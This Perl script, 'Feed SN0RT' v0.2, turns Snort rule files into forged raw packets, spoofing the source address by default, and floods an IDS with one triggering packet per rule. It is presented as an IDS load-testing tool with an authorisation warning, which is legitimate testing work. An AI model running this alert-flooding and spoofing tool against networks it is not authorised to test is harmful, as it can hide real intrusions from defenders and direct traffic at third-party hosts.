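#!/usr/bin/perl
#
# Feed SN0RT
# Version 0.2
#
# Flooding a SN0RT IDS with packets created from
# SN0RT rule files: every rule found in the given .rules file(s) is
# turned into one packet carrying the header fields and payload the
# rule looks for, so a sensor watching the wire raises one alert per
# rule.  Useful for exercising an IDS / alert pipeline under load.
#
# Programmed by Bastian Ballmann [bytebeater@crazydj.de]
# http://www.crazydj.de
#
# Last Update: 06.11.2002
#
# This code is licensed under the GPL
#
# NOTE: this tool writes forged packets through a raw socket, by
# default with the target's own address as source (see start()).
# Only run it against sensors you are authorised to test; with a
# spoofed source any replies go to the spoofed host, not to you.

use strict;
use warnings;

###[ Loading modules ]###
use Getopt::Std;   # Parsing parameters
use path::config;  # Reading configuration
use Net::RawIP;    # Creating packets
use path::hijack;  # Hijacking stuff

###[ Config ]###
# Package globals.  They are deliberately package-scoped (not "my")
# because feed_snort-gui.pl, require'd in --gui mode, is expected to
# create the Tk widgets $result/$top and to call start() itself.
our %args;            # command line options filled by getopts()
our $cfg;             # configuration object (path::config)
our @ruleset;         # one hashref per parsed snort rule
our ($result, $top);  # Tk text widget / main window, GUI mode only

# Port values substituted for the snort variables $HTTP_PORTS,
# $ORACLE_PORTS and $SHELLCODE_PORTS.  A config file (-c) may override
# them.
our $http_ports      = 80;
our $oracle_ports    = 1521;
our $shellcode_ports = 22;

# Decided once, before getopts() gets a chance to consume @ARGV.
our $gui_mode = (defined $ARGV[0] && $ARGV[0] eq "--gui") ? 1 : 0;

###[ MAIN PART ]###
# Raw sockets need root.  $< is the *real* uid, so a setuid-root copy
# of this script is rejected too -- the stricter and intended choice.
if ($< != 0) {
    die "You must have EUID 0 to use this tool!\n\n";
}

# Need help?
if (defined $ARGV[0] && $ARGV[0] eq "--help") {
    print_usage();
}

if ($gui_mode) {
    require "feed_snort-gui.pl";
}
else {
    # -v verbose, -r rules, -s source ip, -h target host, -p default
    # port, -w seconds to wait between packets, -c config file
    getopts('vr:s:h:p:w:c:', \%args) or print_usage();
    start();
}

###[ Subroutines ]###

# True for a value that was actually given (defined and non-empty).
sub _given {
    my $value = shift;
    return defined $value && $value ne "";
}

# Write a status line to the GUI text widget in --gui mode, to STDOUT
# otherwise.  $result and $top come from feed_snort-gui.pl.
sub say_status {
    my $text = shift;
    if ($gui_mode) {
        $result->insert('end', $text);
        $top->update();
    }
    else {
        print $text;
    }
    return;
}

# Start the process: build the configuration from -c or from the
# command line options, fill in the defaults and run feed_snort().
# Dies (after printing the usage) when no rule path or no target is
# known.
sub start {
    if (_given($args{'c'})) {
        # Read a config file; its values win over the built-in
        # defaults and over -r.
        print "[ Reading config file $args{'c'} ]\n";
        $cfg = config->new();
        my %params = $cfg->readcfg($args{'c'});
        $cfg->register_config(%params);

        $args{'r'}       = $params{'rules'}           if _given($params{'rules'});
        $http_ports      = $params{'http_ports'}      if _given($params{'http_ports'});
        $oracle_ports    = $params{'oracle_ports'}    if _given($params{'oracle_ports'});
        $shellcode_ports = $params{'shellcode_ports'} if _given($params{'shellcode_ports'});
    }
    else {
        $cfg = config->new();
        $cfg->check(%args);
    }

    # No rule files specified?  (print_usage() used to exit(0) before
    # the following die was reached, so the reason was never shown.)
    print_usage("\nError: I need some snort rule files...\n\n")
        unless _given($args{'r'});

    # No target?
    print_usage("Error: What about a target???\n\n")
        unless $cfg->target;

    # No source ip?  Well attack yaself...
    $cfg->set_source($cfg->get_target) unless $cfg->source;

    # No default port?
    $cfg->set_port(80) unless $cfg->port;

    # Parse the rule files, create the packets and throw them on the wire
    print_about();
    feed_snort();
    return;
}

# Main subroutine
# Control subroutine to parse the rule files, create and send the
# attack packets.  $args{'r'} may name a single rule file or a
# directory, in which case every *.rules file in it is used.
sub feed_snort {
    my $path = $args{'r'};

    # Start from a clean slate so a second run (GUI) does not resend
    # the rules of the previous one.
    @ruleset = ();

    if (-f $path) {
        parse_rules($path);
    }
    elsif (-d $path) {
        opendir(my $dh, $path) or die "Error: Cannot read $path\n$!\n\n";
        # sorted so the packet order is reproducible between runs
        my @files = sort grep { /\.rules$/ } readdir($dh);
        closedir($dh);
        parse_rules("$path/$_") for @files;
    }
    else {
        die "Error: Cannot find file or directory $path\n\n";
    }

    # Build and send the packets once per source address.  (Building
    # them for every source first and sending afterwards, as before,
    # meant that with several sources only the last one hit the wire.)
    if ($cfg->multisource) {
        for my $source (@{ $cfg->get_source }) {
            create_packets($source, $cfg->get_target);
            send_packets();
        }
    }
    else {
        create_packets($cfg->get_source, $cfg->get_target);
        send_packets();
    }

    print "\n[Finished feeding]\n\n";
    return;
}

# Subroutine to parse SN0RT rule files: appends one hashref per rule in
# $input to @ruleset and reports how many this file contributed.
sub parse_rules {
    my $input = shift;
    say_status("[Parsing rule file $input]\n");

    # three-argument open: $input comes from the command line / config
    # file and must never be interpreted as a mode or a pipe
    open(my $fh, '<', $input) or die "Error: Cannot read file $input!\n$!\n\n";
    my $before = scalar @ruleset;
    while (my $line = <$fh>) {
        # Dont parse comments or empty lines
        next if $line =~ /^\s*#/ || length($line) < 5;
        push @ruleset, parse_rule_line($line);
    }
    close($fh);

    say_status("[Found " . (scalar(@ruleset) - $before) . " rules in file $input]\n");
    return;
}

# Map the port field of a rule header to a concrete port number:
# "any" / missing -> the -p default, the known snort variables to the
# configured values, an open-ended range "1024:" to its lower bound.
sub resolve_port {
    my $field = shift;
    return $cfg->get_port if !defined $field || $field eq "" || $field eq "any";
    return $http_ports      if $field =~ /HTTP/;
    return $oracle_ports    if $field =~ /ORACLE/;
    return $shellcode_ports if $field =~ /SHELLCODE/;
    # Any other snort variable ($SSH_PORTS, ...) is unknown here; use the
    # default port instead of handing the literal "$SSH_PORTS" on.
    return $cfg->get_port if $field =~ /^\$/;
    $field =~ s/:$//;
    return $field;
}

# Turn one snort rule line into the hashref that hijack::create_packet()
# consumes.  Header layout: action proto src_ip src_port dir dst_ip
# dst_port, followed by "(key:value; key; ...)" options, each of which
# is stored under its own key; flags: is expanded into syn/ack/...
sub parse_rule_line {
    my $line = shift;
    my %rule;

    # split ' ' collapses runs of whitespace, so an extra blank between
    # two header fields does not shift every later index
    my @header = split(' ', $line);
    $rule{protocol} = $header[1];
    $rule{src_port} = resolve_port($header[3]);
    $rule{dst_port} = resolve_port($header[6]);

    # Set default values: a tcp rule without flags: becomes a plain ACK
    if (defined $rule{protocol} && $rule{protocol} eq "tcp") {
        $rule{$_} = 0 for qw(syn rst fin psh urg);
        $rule{ack} = 1;
    }
    $rule{ttl} = 64;
    $rule{win} = 1024;

    # Options between the outermost parentheses.  Splitting on /\s*;\s*/
    # also drops the ';' that used to stick to the last option's value.
    my @options = ($line =~ /\((.*)\)/) ? split(/\s*;\s*/, $1) : ();
    for my $option (@options) {
        $option =~ s/^\s+//;
        next if $option eq "";
        # limit 2: a payload such as content:"a:b" keeps its colon
        my ($key, $value) = split(/:/, $option, 2);
        if ($key eq "flags") {
            my $flags = defined $value ? $value : "";
            $rule{syn} = 1 if $flags =~ /S/i;
            $rule{ack} = 1 if $flags =~ /A/i;
            $rule{rst} = 1 if $flags =~ /R/i;
            $rule{fin} = 1 if $flags =~ /F/i;
            $rule{psh} = 1 if $flags =~ /P/i;
            # NOTE(review): "+" in snort means "these flags plus any
            # others"; the original mapped it to PSH and that is kept.
            $rule{psh} = 1 if $flags =~ /\+/;
            $rule{urg} = 1 if $flags =~ /U/i;
        }
        else {
            $rule{$key} = $value;
        }
    }

    # Strip the quotes from data: / uricontent:, uricontent winning.
    # Only assign after a successful match -- a failed match leaves $1
    # holding the previous capture (the option list above), which the
    # old code then used as payload.  The old test also looked at the
    # hash %rule_cfg instead of the hashref, so uricontent never won.
    # NOTE(review): content: is stored verbatim under {content}; which
    # key path::hijack reads for the payload is not visible here.
    if (defined $rule{data} && $rule{data} =~ /"(.*)"/) {
        $rule{data} = $1;
    }
    if (defined $rule{uricontent} && $rule{uricontent} =~ /"(.*)"/) {
        $rule{data} = $1;
    }

    # spoof is filled in by create_packets() per source address
    $rule{target} = $cfg->get_target;
    return \%rule;
}

# Create the attack packets: one hijack::create_packet() call per rule,
# with $source/$target written into the rule first.  (The original
# ignored $source and used $cfg->get_source, which in multisource mode
# is an array ref rather than an address.)
sub create_packets {
    my ($source, $target) = @_;
    say_status("[Creating packets...]\n");
    for my $rule (@ruleset) {
        $rule->{spoof}  = $source;
        $rule->{target} = $target;
        $rule->{packet} = hijack::create_packet($rule);
    }
    return;
}

# Throw the packets on the wire, optionally (-v) describing each one and
# (-w) pausing between them.  Rules whose packet could not be built
# (create_packet() returned a non-reference) are skipped silently.
sub send_packets {
    say_status("[Sending packets]\n\n");
    for my $rule (@ruleset) {
        # rule fields such as msg or the tcp flags may legitimately be
        # absent (udp rules, rules without msg:)
        no warnings 'uninitialized';

        say_status(">>> Simulating $rule->{msg} attack to " . $cfg->get_target . "\n");

        my $packet = $rule->{packet};
        if (ref($packet)) {
            $packet->send(0, 1);
        }

        # Be verbose: report the addresses actually written into the
        # rule, not $args{'s'}/$args{'h'} (empty in config-file mode)
        if ($args{'v'}) {
            say_status("    $rule->{spoof}:$rule->{src_port} --> $rule->{target}:$rule->{dst_port}\n");
            say_status("    Flags: SYN $rule->{syn} ACK $rule->{ack} RST $rule->{rst} FIN $rule->{fin} PSH $rule->{psh} URG $rule->{urg}\n");
            say_status("    Payload: $rule->{content}\n\n");
        }

        # Timer?
        sleep($args{'w'}) if _given($args{'w'});
    }
    return;
}

# Usage.  With an $error message the text is followed by die($error)
# (non-zero exit); without one it exits 0 as before.
sub print_usage {
    my $error = shift;
    print_about();
    print "Usage: $0 -r <snort-rulefiles> -s <source-ip> -h <host> [-p <n>] [-w <n>] [-v]\n";
    print "       $0 -c <config-file>\n";
    print "       $0 --gui\n\n";
    print "-r <path>  Snort rule file, or directory of *.rules files\n";
    print "-s <ip>    Source ip to use (default: the target itself)\n";
    print "-h <host>  Target host\n";
    print "-p <n>     Default port if keyword any was found in the rule\n";
    print "-w <n>     To wait n seconds after sending an attack packet\n";
    print "-v         Verbose output\n";
    print "-c <file>  Read the options from a config file\n";
    print "--help     to get this text\n";
    die $error if defined $error;
    exit(0);
}

# About
sub print_about {
    print "Feed SN0RT - Programmed by Bytebeater\n";
    print "[ http://www.crazydj.de ]\n";
    print "Version 0.2\n\n";
    return;
}

###[ Thats the end folks =) ]###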